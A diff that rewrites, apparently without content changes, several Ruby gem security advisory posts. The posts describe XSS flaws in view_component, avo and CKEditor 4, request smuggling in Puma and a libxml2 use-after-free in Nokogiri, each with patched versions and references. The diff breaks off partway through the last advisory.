--- a/advisories/_posts/2024-01-04-CVE-2024-21636.md
+++ b/advisories/_posts/2024-01-04-CVE-2024-21636.md
@@ -1,73 +1,73 @@
----
-layout: advisory
-title: 'CVE-2024-21636 (view_component): view_component Cross-site Scripting vulnerability'
-comments: false
-categories:
-- view_component
-advisory:
-  gem: view_component
-  cve: 2024-21636
-  ghsa: wf2x-8w6j-qw37
-  url: https://github.com/ViewComponent/view_component/security/advisories/GHSA-wf2x-8w6j-qw37
-  title: view_component Cross-site Scripting vulnerability
-  date: 2024-01-04
-  description: |2
-
-    ### Impact
-    _What kind of vulnerability is it? Who is impacted?_
-
-    This is an XSS vulnerability that has the potential to impact
-    anyone rendering a component directly from a controller with the
-    view_component gem. Note that only components that define a
-    [`#call` method](https://viewcomponent.org/guide/templates.html#call)
-    (i.e. instead of using a sidecar template) are affected. The return
-    value of the `#call` method is not sanitized and can include
-    user-defined content.
-
-    In addition, the return value of the
-    [`#output_postamble` method](https://viewcomponent.org/api.html#output_postamble--string)
-    is not sanitized, which can also lead to XSS issues.
-
-    ### Patches
-    _Has the problem been patched? What versions should users upgrade to?_
-
-    Versions 3.9.0 has been released and fully mitigates both the
-    `#call` and the `#output_postamble` vulnerabilities.
-
-    ### Workarounds
-    _Is there a way for users to fix or remediate the vulnerability
-    without upgrading?_
-
-    Sanitize the return value of `#call`, eg:
-
-    ```ruby
-    class MyComponent < ApplicationComponent
-      def call
-        html_escape("<div>#{user_input}</div>")
-      end
-    end
-    ```
-
-    ### References
-    _Are there any links users can visit to find out more?_
-
-    https://github.com/ViewComponent/view_component/pull/1950
-
-    ### For more information
-
-    If you have any questions or comments about this advisory:
-
-    Open an issue in the
-    [github/view_component](https://github.com/github/view_component) project.
-  cvss_v3: 6.1
-  patched_versions:
-  - "~> 2.83.0"
-  - ">= 3.9.0"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-21636
-    - https://github.com/ViewComponent/view_component/security/advisories/GHSA-wf2x-8w6j-qw37
-    - https://github.com/ViewComponent/view_component/pull/1950
-    - https://github.com/ViewComponent/view_component/commit/0d26944a8d2730ea40e60eae23d70684483e5017
-    - https://github.com/advisories/GHSA-wf2x-8w6j-qw37
----
+---
+layout: advisory
+title: 'CVE-2024-21636 (view_component): view_component Cross-site Scripting vulnerability'
+comments: false
+categories:
+- view_component
+advisory:
+  gem: view_component
+  cve: 2024-21636
+  ghsa: wf2x-8w6j-qw37
+  url: https://github.com/ViewComponent/view_component/security/advisories/GHSA-wf2x-8w6j-qw37
+  title: view_component Cross-site Scripting vulnerability
+  date: 2024-01-04
+  description: |2
+
+    ### Impact
+    _What kind of vulnerability is it? Who is impacted?_
+
+    This is an XSS vulnerability that has the potential to impact
+    anyone rendering a component directly from a controller with the
+    view_component gem. Note that only components that define a
+    [`#call` method](https://viewcomponent.org/guide/templates.html#call)
+    (i.e. instead of using a sidecar template) are affected. The return
+    value of the `#call` method is not sanitized and can include
+    user-defined content.
+
+    In addition, the return value of the
+    [`#output_postamble` method](https://viewcomponent.org/api.html#output_postamble--string)
+    is not sanitized, which can also lead to XSS issues.
+
+    ### Patches
+    _Has the problem been patched? What versions should users upgrade to?_
+
+    Versions 3.9.0 has been released and fully mitigates both the
+    `#call` and the `#output_postamble` vulnerabilities.
+
+    ### Workarounds
+    _Is there a way for users to fix or remediate the vulnerability
+    without upgrading?_
+
+    Sanitize the return value of `#call`, eg:
+
+    ```ruby
+    class MyComponent < ApplicationComponent
+      def call
+        html_escape("<div>#{user_input}</div>")
+      end
+    end
+    ```
+
+    ### References
+    _Are there any links users can visit to find out more?_
+
+    https://github.com/ViewComponent/view_component/pull/1950
+
+    ### For more information
+
+    If you have any questions or comments about this advisory:
+
+    Open an issue in the
+    [github/view_component](https://github.com/github/view_component) project.
+  cvss_v3: 6.1
+  patched_versions:
+  - "~> 2.83.0"
+  - ">= 3.9.0"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-21636
+    - https://github.com/ViewComponent/view_component/security/advisories/GHSA-wf2x-8w6j-qw37
+    - https://github.com/ViewComponent/view_component/pull/1950
+    - https://github.com/ViewComponent/view_component/commit/0d26944a8d2730ea40e60eae23d70684483e5017
+    - https://github.com/advisories/GHSA-wf2x-8w6j-qw37
+---
diff --git a/advisories/_posts/2024-01-08-CVE-2024-21647.md b/advisories/_posts/2024-01-08-CVE-2024-21647.md
index e74e5868..fc92643e 100644
--- a/advisories/_posts/2024-01-08-CVE-2024-21647.md
+++ b/advisories/_posts/2024-01-08-CVE-2024-21647.md
@@ -1,50 +1,50 @@
----
-layout: advisory
-title: 'CVE-2024-21647 (puma): Puma HTTP Request/Response Smuggling vulnerability'
-comments: false
-categories:
-- puma
-advisory:
-  gem: puma
-  cve: 2024-21647
-  ghsa: c2f4-cvqm-65w2
-  url: https://github.com/puma/puma/security/advisories/GHSA-c2f4-cvqm-65w2
-  title: Puma HTTP Request/Response Smuggling vulnerability
-  date: 2024-01-08
-  description: |2
-
-    ### Impact
-    Prior to versions 6.4.2 and 5.6.8, puma exhibited incorrect
-    behavior when parsing chunked transfer encoding bodies in a
-    way that allowed HTTP request smuggling.
-
-    Fixed versions limit the size of chunk extensions. Without this
-    limit, an attacker could cause unbounded resource (CPU, network
-    bandwidth) consumption.
-
-    ### Patches
-
-    The vulnerability has been fixed in 6.4.2 and 5.6.8.
-
-    ### Workarounds
-
-    No known workarounds.
-
-    ### References
-
-    * [HTTP Request Smuggling](https://portswigger.net/web-security/request-smuggling)
-    * Open an issue in [Puma](https://github.com/puma/puma)
-    * See our [security policy](https://github.com/puma/puma/security/policy)
-  cvss_v3: 5.9
-  patched_versions:
-  - "~> 5.6.8"
-  - ">= 6.4.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-21647
-    - https://github.com/puma/puma/security/advisories/GHSA-c2f4-cvqm-65w2
-    - https://github.com/puma/puma/commit/5fc43d73b6ff193325e657a24ed76dec79133e93
-    - https://github.com/puma/puma/commit/60d5ee3734adc8cee85c3f0561af392448fe19b7
-    - https://github.com/puma/puma/commit/bbb880ffb6debbfdea535b4b3eb2204d49ae151d
-    - https://github.com/advisories/GHSA-c2f4-cvqm-65w2
----
+---
+layout: advisory
+title: 'CVE-2024-21647 (puma): Puma HTTP Request/Response Smuggling vulnerability'
+comments: false
+categories:
+- puma
+advisory:
+  gem: puma
+  cve: 2024-21647
+  ghsa: c2f4-cvqm-65w2
+  url: https://github.com/puma/puma/security/advisories/GHSA-c2f4-cvqm-65w2
+  title: Puma HTTP Request/Response Smuggling vulnerability
+  date: 2024-01-08
+  description: |2
+
+    ### Impact
+    Prior to versions 6.4.2 and 5.6.8, puma exhibited incorrect
+    behavior when parsing chunked transfer encoding bodies in a
+    way that allowed HTTP request smuggling.
+
+    Fixed versions limit the size of chunk extensions. Without this
+    limit, an attacker could cause unbounded resource (CPU, network
+    bandwidth) consumption.
+
+    ### Patches
+
+    The vulnerability has been fixed in 6.4.2 and 5.6.8.
+
+    ### Workarounds
+
+    No known workarounds.
+
+    ### References
+
+    * [HTTP Request Smuggling](https://portswigger.net/web-security/request-smuggling)
+    * Open an issue in [Puma](https://github.com/puma/puma)
+    * See our [security policy](https://github.com/puma/puma/security/policy)
+  cvss_v3: 5.9
+  patched_versions:
+  - "~> 5.6.8"
+  - ">= 6.4.2"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-21647
+    - https://github.com/puma/puma/security/advisories/GHSA-c2f4-cvqm-65w2
+    - https://github.com/puma/puma/commit/5fc43d73b6ff193325e657a24ed76dec79133e93
+    - https://github.com/puma/puma/commit/60d5ee3734adc8cee85c3f0561af392448fe19b7
+    - https://github.com/puma/puma/commit/bbb880ffb6debbfdea535b4b3eb2204d49ae151d
+    - https://github.com/advisories/GHSA-c2f4-cvqm-65w2
+---
diff --git a/advisories/_posts/2024-01-16-CVE-2024-22191.md b/advisories/_posts/2024-01-16-CVE-2024-22191.md
index 72719943..760bdc8e 100644
--- a/advisories/_posts/2024-01-16-CVE-2024-22191.md
+++ b/advisories/_posts/2024-01-16-CVE-2024-22191.md
@@ -1,52 +1,52 @@
----
-layout: advisory
-title: 'CVE-2024-22191 (avo): avo vulnerable to stored cross-site scripting (XSS)
-  in key_value field'
-comments: false
-categories:
-- avo
-advisory:
-  gem: avo
-  cve: 2024-22191
-  ghsa: ghjv-mh6x-7q6h
-  url: https://github.com/avo-hq/avo/security/advisories/GHSA-ghjv-mh6x-7q6h
-  title: avo vulnerable to stored cross-site scripting (XSS) in key_value field
-  date: 2024-01-16
-  description: |2
-
-    ### Summary
-
-    A **stored cross-site scripting (XSS)** vulnerability was found in
-    the **key_value** field of Avo v3.2.3. This vulnerability could allow
-    an attacker to execute arbitrary JavaScript code in the victim's browser.
-
-    ### Details
-
-    The value of the key_value is inserted directly into the HTML code.
-    In the current version of Avo (possibly also older versions), the
-    value is not properly sanitized before it is inserted into the HTML code.
-
-    This vulnerability can be exploited by an attacker to inject malicious
-    JavaScript code into the key_value field. When a victim views the page
-    containing the malicious code, the code will be executed in their browser.
-
-    In [avo/fields/common/key_value_component.html.erb](https://github.com/avo-hq/avo/blob/main/app/components/avo/fields/common/key_value_component.html.erb#L38C21-L38C33)
-    the value is taken in lines **38** and **49** and seems to be
-    interpreted directly as html in lines **44** and **55**.
-
-    ### Impact
-
-    This vulnerability could be used to steal sensitive information from
-    victims that could be used to hijack victims' accounts or redirect
-    them to malicious websites.
-  cvss_v3: 7.3
-  patched_versions:
-  - ">= 3.2.4"
-  - "~> 2.47, >= 2.47"
-  related:
-    url:
-    - https://github.com/avo-hq/avo/security/advisories/GHSA-ghjv-mh6x-7q6h
-    - https://github.com/avo-hq/avo/commit/51bb80b181cd8e31744bdc4e7f9b501c81172347
-    - https://github.com/avo-hq/avo/commit/fc92a05a8556b1787c8694643286a1afa6a71258
-    - https://github.com/advisories/GHSA-ghjv-mh6x-7q6h
----
+---
+layout: advisory
+title: 'CVE-2024-22191 (avo): avo vulnerable to stored cross-site scripting (XSS)
+  in key_value field'
+comments: false
+categories:
+- avo
+advisory:
+  gem: avo
+  cve: 2024-22191
+  ghsa: ghjv-mh6x-7q6h
+  url: https://github.com/avo-hq/avo/security/advisories/GHSA-ghjv-mh6x-7q6h
+  title: avo vulnerable to stored cross-site scripting (XSS) in key_value field
+  date: 2024-01-16
+  description: |2
+
+    ### Summary
+
+    A **stored cross-site scripting (XSS)** vulnerability was found in
+    the **key_value** field of Avo v3.2.3. This vulnerability could allow
+    an attacker to execute arbitrary JavaScript code in the victim's browser.
+
+    ### Details
+
+    The value of the key_value is inserted directly into the HTML code.
+    In the current version of Avo (possibly also older versions), the
+    value is not properly sanitized before it is inserted into the HTML code.
+
+    This vulnerability can be exploited by an attacker to inject malicious
+    JavaScript code into the key_value field. When a victim views the page
+    containing the malicious code, the code will be executed in their browser.
+
+    In [avo/fields/common/key_value_component.html.erb](https://github.com/avo-hq/avo/blob/main/app/components/avo/fields/common/key_value_component.html.erb#L38C21-L38C33)
+    the value is taken in lines **38** and **49** and seems to be
+    interpreted directly as html in lines **44** and **55**.
+
+    ### Impact
+
+    This vulnerability could be used to steal sensitive information from
+    victims that could be used to hijack victims' accounts or redirect
+    them to malicious websites.
+  cvss_v3: 7.3
+  patched_versions:
+  - ">= 3.2.4"
+  - "~> 2.47, >= 2.47"
+  related:
+    url:
+    - https://github.com/avo-hq/avo/security/advisories/GHSA-ghjv-mh6x-7q6h
+    - https://github.com/avo-hq/avo/commit/51bb80b181cd8e31744bdc4e7f9b501c81172347
+    - https://github.com/avo-hq/avo/commit/fc92a05a8556b1787c8694643286a1afa6a71258
+    - https://github.com/advisories/GHSA-ghjv-mh6x-7q6h
+---
diff --git a/advisories/_posts/2024-01-17-CVE-2024-22411.md b/advisories/_posts/2024-01-17-CVE-2024-22411.md
index 826d9b52..d96c2094 100644
--- a/advisories/_posts/2024-01-17-CVE-2024-22411.md
+++ b/advisories/_posts/2024-01-17-CVE-2024-22411.md
@@ -1,34 +1,34 @@
----
-layout: advisory
-title: 'CVE-2024-22411 (avo): Cross-site scripting (XSS) in Action messages on Avo'
-comments: false
-categories:
-- avo
-advisory:
-  gem: avo
-  cve: 2024-22411
-  ghsa: g8vp-2v5p-9qfh
-  url: https://github.com/avo-hq/avo/security/advisories/GHSA-g8vp-2v5p-9qfh
-  title: Cross-site scripting (XSS) in Action messages on Avo
-  date: 2024-01-17
-  description: |
-    Avo is a framework to create admin panels for Ruby on Rails apps.
-    In Avo 3 pre12 any HTML inside text that is passed to `error` or
-    `succeed` in an `Avo::BaseAction` subclass will be rendered directly
-    without sanitization in the toast/notification that appears in the
-    UI on Action completion. A malicious user could exploit this
-    vulnerability to trigger a cross site scripting attack on an
-    unsuspecting user.
-
-    This issue has been addressed in the 3.0.2 release of Avo. Users
-    are advised to upgrade.
-  cvss_v3: 6.5
-  patched_versions:
-  - ">= 3.3.0"
-  - "~> 2.47, >= 2.47"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-22411
-    - https://github.com/avo-hq/avo/security/advisories/GHSA-g8vp-2v5p-9qfh
-    - https://github.com/advisories/GHSA-g8vp-2v5p-9qfh
----
+---
+layout: advisory
+title: 'CVE-2024-22411 (avo): Cross-site scripting (XSS) in Action messages on Avo'
+comments: false
+categories:
+- avo
+advisory:
+  gem: avo
+  cve: 2024-22411
+  ghsa: g8vp-2v5p-9qfh
+  url: https://github.com/avo-hq/avo/security/advisories/GHSA-g8vp-2v5p-9qfh
+  title: Cross-site scripting (XSS) in Action messages on Avo
+  date: 2024-01-17
+  description: |
+    Avo is a framework to create admin panels for Ruby on Rails apps.
+    In Avo 3 pre12 any HTML inside text that is passed to `error` or
+    `succeed` in an `Avo::BaseAction` subclass will be rendered directly
+    without sanitization in the toast/notification that appears in the
+    UI on Action completion. A malicious user could exploit this
+    vulnerability to trigger a cross site scripting attack on an
+    unsuspecting user.
+
+    This issue has been addressed in the 3.0.2 release of Avo. Users
+    are advised to upgrade.
+  cvss_v3: 6.5
+  patched_versions:
+  - ">= 3.3.0"
+  - "~> 2.47, >= 2.47"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-22411
+    - https://github.com/avo-hq/avo/security/advisories/GHSA-g8vp-2v5p-9qfh
+    - https://github.com/advisories/GHSA-g8vp-2v5p-9qfh
+---
diff --git a/advisories/_posts/2024-02-04-GHSA-xc9x-jj77-9p9j.md b/advisories/_posts/2024-02-04-GHSA-xc9x-jj77-9p9j.md
index 01b655d0..24880e15 100644
--- a/advisories/_posts/2024-02-04-GHSA-xc9x-jj77-9p9j.md
+++ b/advisories/_posts/2024-02-04-GHSA-xc9x-jj77-9p9j.md
@@ -1,63 +1,63 @@
----
-layout: advisory
-title: 'GHSA-xc9x-jj77-9p9j (nokogiri): Use-after-free in libxml2 via Nokogiri::XML::Reader'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  ghsa: xc9x-jj77-9p9j
-  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-xc9x-jj77-9p9j
-  title: Use-after-free in libxml2 via Nokogiri::XML::Reader
-  date: 2024-02-04
-  description: |
-    ### Summary
-
-    Nokogiri upgrades its dependency libxml2 as follows:
-    - v1.15.6 upgrades libxml2 to 2.11.7 from 2.11.6
-    - v1.16.2 upgrades libxml2 to 2.12.5 from 2.12.4
-
-    libxml2 v2.11.7 and v2.12.5 address the following vulnerability:
-
-    CVE-2024-25062 / https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25062
-    - described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/604
-    - patched by https://gitlab.gnome.org/GNOME/libxml2/-/commit/92721970
-
-    Please note that this advisory only applies to the CRuby implementation of Nokogiri, and only if
-    the packaged libraries are being used. If you've overridden defaults at installation time to use
-    system libraries instead of packaged libraries, you should instead pay attention to your distro's
-    libxml2 release announcements.
-
-    JRuby users are not affected.
-
-    ### Severity
-
-    The Nokogiri maintainers have evaluated this as **Moderate**.
-
-    ### Impact
-
-    From the CVE description, this issue applies to the `xmlTextReader` module (which underlies
-    `Nokogiri::XML::Reader`):
-
-    > When using the XML Reader interface with DTD validation and XInclude expansion enabled,
-    > processing crafted XML documents can lead to an xmlValidatePopElement use-after-free.
-
-    ### Mitigation
-
-    Upgrade to Nokogiri `~> 1.15.6` or `>= 1.16.2`.
-
-    Users who are unable to upgrade Nokogiri may also choose a more complicated mitigation: compile
-    and link Nokogiri against patched external libxml2 libraries which will also address these same
-    issues.
-  patched_versions:
-  - "~> 1.15.6"
-  - ">= 1.16.2"
-  related:
-    cve:
-    - 2024-25062
-    url:
-    - https://github.com/sparklemotion/nokogiri/commit/1b768b797fd42d94de12b9cff4ed0221f5cb92ec
-    - https://github.com/sparklemotion/nokogiri/releases/tag/v1.15.6
-    - https://github.com/sparklemotion/nokogiri/releases/tag/v1.16.2
-    - https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-xc9x-jj77-9p9j
----
+---
+layout: advisory
+title: 'GHSA-xc9x-jj77-9p9j (nokogiri): Use-after-free in libxml2 via Nokogiri::XML::Reader'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  ghsa: xc9x-jj77-9p9j
+  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-xc9x-jj77-9p9j
+  title: Use-after-free in libxml2 via Nokogiri::XML::Reader
+  date: 2024-02-04
+  description: |
+    ### Summary
+
+    Nokogiri upgrades its dependency libxml2 as follows:
+    - v1.15.6 upgrades libxml2 to 2.11.7 from 2.11.6
+    - v1.16.2 upgrades libxml2 to 2.12.5 from 2.12.4
+
+    libxml2 v2.11.7 and v2.12.5 address the following vulnerability:
+
+    CVE-2024-25062 / https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25062
+    - described at https://gitlab.gnome.org/GNOME/libxml2/-/issues/604
+    - patched by https://gitlab.gnome.org/GNOME/libxml2/-/commit/92721970
+
+    Please note that this advisory only applies to the CRuby implementation of Nokogiri, and only if
+    the packaged libraries are being used. If you've overridden defaults at installation time to use
+    system libraries instead of packaged libraries, you should instead pay attention to your distro's
+    libxml2 release announcements.
+
+    JRuby users are not affected.
+
+    ### Severity
+
+    The Nokogiri maintainers have evaluated this as **Moderate**.
+
+    ### Impact
+
+    From the CVE description, this issue applies to the `xmlTextReader` module (which underlies
+    `Nokogiri::XML::Reader`):
+
+    > When using the XML Reader interface with DTD validation and XInclude expansion enabled,
+    > processing crafted XML documents can lead to an xmlValidatePopElement use-after-free.
+
+    ### Mitigation
+
+    Upgrade to Nokogiri `~> 1.15.6` or `>= 1.16.2`.
+
+    Users who are unable to upgrade Nokogiri may also choose a more complicated mitigation: compile
+    and link Nokogiri against patched external libxml2 libraries which will also address these same
+    issues.
+  patched_versions:
+  - "~> 1.15.6"
+  - ">= 1.16.2"
+  related:
+    cve:
+    - 2024-25062
+    url:
+    - https://github.com/sparklemotion/nokogiri/commit/1b768b797fd42d94de12b9cff4ed0221f5cb92ec
+    - https://github.com/sparklemotion/nokogiri/releases/tag/v1.15.6
+    - https://github.com/sparklemotion/nokogiri/releases/tag/v1.16.2
+    - https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-xc9x-jj77-9p9j
+---
diff --git a/advisories/_posts/2024-02-07-CVE-2023-4771.md b/advisories/_posts/2024-02-07-CVE-2023-4771.md
index 4d5485f0..013519f1 100644
--- a/advisories/_posts/2024-02-07-CVE-2023-4771.md
+++ b/advisories/_posts/2024-02-07-CVE-2023-4771.md
@@ -1,39 +1,39 @@
----
-layout: advisory
-title: 'CVE-2023-4771 (ckeditor): CKEditor cross-site scripting vulnerability in AJAX
-  sample'
-comments: false
-categories:
-- ckeditor
-advisory:
-  gem: ckeditor
-  cve: 2023-4771
-  ghsa: wh5w-82f3-wrxh
-  url: https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-wh5w-82f3-wrxh
-  title: CKEditor cross-site scripting vulnerability in AJAX sample
-  date: 2024-02-07
-  description: |-
-    ### Affected packages
-    The vulnerability has been discovered in the AJAX sample available at the `samples/old/ajax.html` file location. All integrators that use that sample in the production code can be affected.
-
-    ### Impact
-
-    A potential vulnerability has been discovered in one of CKEditor's 4 samples that are shipped with production code. The vulnerability allowed to execute JavaScript code by abusing the AJAX sample. It affects all users using the CKEditor 4 at version < 4.24.0-lts where `samples/old/ajax.html` is used in a production environment.
-
-    ### Patches
-    The problem has been recognized and patched. The fix will be available in version 4.24.0-lts.
-
-    ### For more information
-    Email us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.
-
-    ### Acknowledgements
-    The CKEditor 4 team would like to thank Rafael Pedrero and INCIBE ([original report](https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-cksource-ckeditor)) for recognizing and reporting this vulnerability.
-  cvss_v3: 6.1
-  related:
-    url:
-    - https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-wh5w-82f3-wrxh
-    - https://nvd.nist.gov/vuln/detail/CVE-2023-4771
-    - https://github.com/ckeditor/ckeditor4/commit/8ed1a3c93d0ae5f49f4ecff5738ab8a2972194cb
-    - https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-cksource-ckeditor
-    - https://github.com/advisories/GHSA-wh5w-82f3-wrxh
----
+---
+layout: advisory
+title: 'CVE-2023-4771 (ckeditor): CKEditor cross-site scripting vulnerability in AJAX
+  sample'
+comments: false
+categories:
+- ckeditor
+advisory:
+  gem: ckeditor
+  cve: 2023-4771
+  ghsa: wh5w-82f3-wrxh
+  url: https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-wh5w-82f3-wrxh
+  title: CKEditor cross-site scripting vulnerability in AJAX sample
+  date: 2024-02-07
+  description: |-
+    ### Affected packages
+    The vulnerability has been discovered in the AJAX sample available at the `samples/old/ajax.html` file location. All integrators that use that sample in the production code can be affected.
+
+    ### Impact
+
+    A potential vulnerability has been discovered in one of CKEditor's 4 samples that are shipped with production code. The vulnerability allowed to execute JavaScript code by abusing the AJAX sample. It affects all users using the CKEditor 4 at version < 4.24.0-lts where `samples/old/ajax.html` is used in a production environment.
+
+    ### Patches
+    The problem has been recognized and patched. The fix will be available in version 4.24.0-lts.
+
+    ### For more information
+    Email us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.
+
+    ### Acknowledgements
+    The CKEditor 4 team would like to thank Rafael Pedrero and INCIBE ([original report](https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-cksource-ckeditor)) for recognizing and reporting this vulnerability.
+  cvss_v3: 6.1
+  related:
+    url:
+    - https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-wh5w-82f3-wrxh
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-4771
+    - https://github.com/ckeditor/ckeditor4/commit/8ed1a3c93d0ae5f49f4ecff5738ab8a2972194cb
+    - https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-cksource-ckeditor
+    - https://github.com/advisories/GHSA-wh5w-82f3-wrxh
+---
diff --git a/advisories/_posts/2024-02-07-CVE-2024-24815.md b/advisories/_posts/2024-02-07-CVE-2024-24815.md
index 569b07f9..43eeec7b 100644
--- a/advisories/_posts/2024-02-07-CVE-2024-24815.md
+++ b/advisories/_posts/2024-02-07-CVE-2024-24815.md
@@ -1,44 +1,44 @@
----
-layout: advisory
-title: 'CVE-2024-24815 (ckeditor): CKEditor4 Cross-site Scripting vulnerability caused
-  by incorrect CDATA detection'
-comments: false
-categories:
-- ckeditor
-advisory:
-  gem: ckeditor
-  cve: 2024-24815
-  ghsa: fq6h-4g8v-qqvm
-  url: https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-fq6h-4g8v-qqvm
-  title: CKEditor4 Cross-site Scripting vulnerability caused by incorrect CDATA detection
-  date: 2024-02-07
-  description: |-
-    ### Affected packages
-    The vulnerability has been discovered in the core HTML parsing module and may affect all editor instances that:
-    * Enabled [full-page editing](https://ckeditor.com/docs/ckeditor4/latest/features/fullpage.html) mode,
-    * or enabled [CDATA](https://ckeditor.com/docs/ckeditor4/latest/api/CKEDITOR_dtd.html#property-S-cdata) elements in [Advanced Content Filtering](https://ckeditor.com/docs/ckeditor4/latest/guide/dev_advanced_content_filter.html) configuration (defaults to `script` and `style` elements).
-
-    ### Impact
-
-    A potential vulnerability has been discovered in CKEditor 4 HTML processing core module. The vulnerability allowed to inject malformed HTML content bypassing Advanced Content Filtering mechanism, which could result in executing JavaScript code. An attacker could abuse faulty CDATA content detection and use it to prepare an intentional attack on the editor. It affects all users using the CKEditor 4 at version < 4.24.0-lts.
-
-    ### Patches
-    The problem has been recognized and patched. The fix will be available in version 4.24.0-lts.
-
-    ### For more information
-    Email us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.
-
-    ### Acknowledgements
-    The CKEditor 4 team would like to thank [Michal Frýba](https://cz.linkedin.com/in/michal-fryba) from [ALEF NULA](https://www.alefnula.com/) for recognizing and reporting this vulnerability.
-  cvss_v3: 6.1
-  related:
-    url:
-    - https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-fq6h-4g8v-qqvm
-    - https://github.com/ckeditor/ckeditor4/commit/8ed1a3c93d0ae5f49f4ecff5738ab8a2972194cb
-    - https://ckeditor.com/docs/ckeditor4/latest/api/CKEDITOR_dtd.html#property-S-cdata
-    - https://ckeditor.com/docs/ckeditor4/latest/features/fullpage.html
-    - https://ckeditor.com/docs/ckeditor4/latest/guide/dev_advanced_content_filter.html
-    - https://nvd.nist.gov/vuln/detail/CVE-2024-24815
-    - https://www.drupal.org/sa-contrib-2024-009
-    - https://github.com/advisories/GHSA-fq6h-4g8v-qqvm
----
+---
+layout: advisory
+title: 'CVE-2024-24815 (ckeditor): CKEditor4 Cross-site Scripting vulnerability caused
+  by incorrect CDATA detection'
+comments: false
+categories:
+- ckeditor
+advisory:
+  gem: ckeditor
+  cve: 2024-24815
+  ghsa: fq6h-4g8v-qqvm
+  url: https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-fq6h-4g8v-qqvm
+  title: CKEditor4 Cross-site Scripting vulnerability caused by incorrect CDATA detection
+  date: 2024-02-07
+  description: |-
+    ### Affected packages
+    The vulnerability has been discovered in the core HTML parsing module and may affect all editor instances that:
+    * Enabled [full-page editing](https://ckeditor.com/docs/ckeditor4/latest/features/fullpage.html) mode,
+    * or enabled [CDATA](https://ckeditor.com/docs/ckeditor4/latest/api/CKEDITOR_dtd.html#property-S-cdata) elements in [Advanced Content Filtering](https://ckeditor.com/docs/ckeditor4/latest/guide/dev_advanced_content_filter.html) configuration (defaults to `script` and `style` elements).
+
+    ### Impact
+
+    A potential vulnerability has been discovered in CKEditor 4 HTML processing core module. The vulnerability allowed to inject malformed HTML content bypassing Advanced Content Filtering mechanism, which could result in executing JavaScript code. An attacker could abuse faulty CDATA content detection and use it to prepare an intentional attack on the editor. It affects all users using the CKEditor 4 at version < 4.24.0-lts.
+
+    ### Patches
+    The problem has been recognized and patched. The fix will be available in version 4.24.0-lts.
+
+    ### For more information
+    Email us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.
+
+    ### Acknowledgements
+    The CKEditor 4 team would like to thank [Michal Frýba](https://cz.linkedin.com/in/michal-fryba) from [ALEF NULA](https://www.alefnula.com/) for recognizing and reporting this vulnerability.
+  cvss_v3: 6.1
+  related:
+    url:
+    - https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-fq6h-4g8v-qqvm
+    - https://github.com/ckeditor/ckeditor4/commit/8ed1a3c93d0ae5f49f4ecff5738ab8a2972194cb
+    - https://ckeditor.com/docs/ckeditor4/latest/api/CKEDITOR_dtd.html#property-S-cdata
+    - https://ckeditor.com/docs/ckeditor4/latest/features/fullpage.html
+    - https://ckeditor.com/docs/ckeditor4/latest/guide/dev_advanced_content_filter.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-24815
+    - https://www.drupal.org/sa-contrib-2024-009
+    - https://github.com/advisories/GHSA-fq6h-4g8v-qqvm
+---
diff --git a/advisories/_posts/2024-02-07-CVE-2024-24816.md b/advisories/_posts/2024-02-07-CVE-2024-24816.md
index 581d16c3..cb3994cb 100644
--- a/advisories/_posts/2024-02-07-CVE-2024-24816.md
+++ b/advisories/_posts/2024-02-07-CVE-2024-24816.md
@@ -1,45 +1,45 @@
----
-layout: advisory
-title: 'CVE-2024-24816 (ckeditor): CKEditor4 Cross-site Scripting vulnerability in
-  samples with enabled the preview feature'
-comments: false
-categories:
-- ckeditor
-advisory:
-  gem: ckeditor
-  cve: 2024-24816
-  ghsa: mw2c-vx6j-mg76
-  url: https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-mw2c-vx6j-mg76
-  title: CKEditor4 Cross-site Scripting vulnerability in samples with enabled the
-    preview feature
-  date: 2024-02-07
-  description: |-
-    ### Affected packages
-    The vulnerability has been discovered in the samples that use the [preview](https://ckeditor.com/cke4/addon/preview) feature:
-
-    * `samples/old/**/*.html`
-    * `plugins/[plugin name]/samples/**/*.html`
-
-    All integrators that use these samples in the production code can be affected.
-
-    ### Impact
-
-    A potential vulnerability has been discovered in one of CKEditor's 4 samples that are shipped with production code. The vulnerability allowed to execute JavaScript code by abusing the misconfigured [preview feature](https://ckeditor.com/cke4/addon/preview). It affects all users using the CKEditor 4 at version < 4.24.0-lts with affected samples used in a production environment.
-
-    ### Patches
-    The problem has been recognized and patched. The fix will be available in version 4.24.0-lts.
-
-    ### For more information
-    Email us at [security@cksource.com](mailto:security@cksource.com) if you have any questions or comments about this advisory.
-
-    ### Acknowledgements
